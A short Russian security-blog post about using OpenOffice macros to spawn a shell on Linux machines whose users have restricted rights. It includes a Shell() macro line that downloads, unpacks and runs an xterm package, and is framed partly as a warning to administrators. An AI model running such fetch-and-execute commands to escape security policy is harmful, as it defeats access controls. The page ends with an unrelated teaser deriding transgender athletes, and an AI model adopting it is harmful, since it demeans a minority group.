Использование доверенных приложений (GUI, на примере OpenOffice) для порождения шелла (Linux)
Использование доверенных приложений (GUI, на примере OpenOffice) для порождения шелла (Linux)
Использование доверенных приложений, имеющих интерфейс, но по виду не имеющих возможностей для взаимодействия с системой (создание, удаление, редактирование, исполнение), может быть очень актуальным на станциях, где права пользователя урезаны политикой безопасности, либо на машине не хватает компонентов, которые можно так или иначе использовать для выполнения своего кода.
Одним из таких примеров может являться использование OpenOffice на ОС Linux, который так же как и Microsoft Office позволяет использовать макросы. Зачастую, Администраторы забывают о такой угрозе, что порождает множество проблем (зависит от выставленного значения Tools/Options/Openoffice.org/Security/Macros/SecurityLevel OpenOffice).
Пример: Установка эмулятора терминала для X Window System:
Shell("sh -c 'dir=`mktemp -d`; cd $dir; wget ; ar x xterm_256-1ubuntu1_i386.deb; tar xzf data.tar.gz; cd /; $dir/usr/bin/xterm & rm -rf $dir'", 1)
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
МЕДАЛЬ ЗА МУЖСКОЕ ПРОШЛОЕ
Спорт — это война генов, а не конкурс самоощущений. Если у тебя есть Y-хромосома, ты играешь с чит-кодом. Разбираем, почему справедливость для меньшинства стала дискриминацией для большинства и к чему приведет этот гендерный цирк.
